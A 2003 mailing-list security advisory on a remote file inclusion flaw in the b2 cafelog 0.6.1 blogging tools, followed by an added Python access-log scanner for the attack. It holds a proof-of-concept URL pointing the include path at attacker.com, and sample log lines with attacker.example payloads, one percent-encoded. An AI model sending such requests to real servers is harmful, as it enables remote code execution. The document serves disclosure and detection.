[VulnWatch] b2 cafelog 0.6.1 remote command execution.

From: pokleyzz (pokleyzz_at_scan-associates.net)
Date: 05/29/03

    Date: Thu, 29 May 2003 15:22:38 +0800
    To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
    
    

    Products: b2 cafelog 0.6.1 (http://cafelog.com/)
    Date: 29 May 2003
    Author: pokleyzz <pokleyzz_at_scan-associates.net>
    Contributors: sk_at_scan-associates.net
                    shaharil_at_scan-associates.net
                    munir_at_scan-associates.net
    URL: http://www.scan-associates.net

    Summary: b2 cafelog 0.6.1 remote command execution.

    Description
    ===========
    b2 cafelog is a blogging system written in PHP with MySQL as its database backend.

    Details
    =======
    b2 cafelog 0.6.1 comes with a b2-tools directory. This directory contains
    two PHP scripts (blogger-2-b2.php and gm-2-b2.php) which allow the user to
    specify $b2inc, the path prefix used in their include() calls, and so
    inject remote code.

    from blogger-2-b2.php line 21
    -----------------------------------------------------
    case "step1":

        include("b2config.php");
        include("$b2inc/b2functions.php");
        include("$b2inc/b2vars.php");
    ------------------------------------------------------------------------------------

    from gm-2-b2.php line 5
    ----------------------------------------------------------
    // 3. load in the browser from there

    include("b2config.php");
    include($b2inc."/b2functions.php");
    -----------------------------------------------------------------------------------

    Proof of concept
    ===========
    http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
    attacker.com hosts a file named b2functions.php containing the PHP script
    you want to execute.

    Workaround
    =========
    Remove b2-tools directory.

    Vendor Response
    ===============
    Vendor was contacted on 19/05/2003 but no reply was given.
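
A log check for the request shape shown in the proof of concept, as an added example that is not part of the original advisory: it flags access-log requests to the two b2-tools scripts that set b2inc. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# The two scripts the advisory names as including files from $b2inc.
SCRIPTS = ("/b2-tools/blogger-2-b2.php", "/b2-tools/gm-2-b2.php")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// sends the include to a URL wrapper.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)

def classify(line):
    """Return (verdict, value) if the request sets b2inc on a listed script."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith(SCRIPTS):
        return None
    # parse_qs percent-decodes once, as PHP does before filling the variable.
    values = parse_qs(query, keep_blank_values=True).get("b2inc")
    if not values:
        return None
    value = values[-1]  # PHP keeps the last duplicate parameter
    return ("remote" if SCHEME.match(value) else "supplied", value)

def scan(lines):
    """Return [(line_number, verdict, value)] for every matching request."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample log lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2003:10:00:01 +0800] "GET /index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [29/May/2003:10:00:02 +0800] '
    '"GET /b2-tools/gm-2-b2.php?b2inc=http://attacker.example HTTP/1.0" 200 312',
    '198.51.100.7 - - [29/May/2003:10:00:03 +0800] "GET /b2-tools/blogger-2-b2.php'
    '?action=step1&b2inc=%68ttp%3A%2F%2Fattacker.example HTTP/1.0" 200 298',
    '192.0.2.10 - - [29/May/2003:10:00:04 +0800] "GET /b2-tools/gm-2-b2.php HTTP/1.0" 200 2048',
    '203.0.113.5 - - [29/May/2003:10:00:05 +0800] '
    '"GET /b2-tools/blogger-2-b2.php?b2inc=../b2-include HTTP/1.0" 200 77',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The check only sees values carried in the query string; a b2inc value sent in a request body is not recorded in an access log, so it complements the workaround above rather than replacing it.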

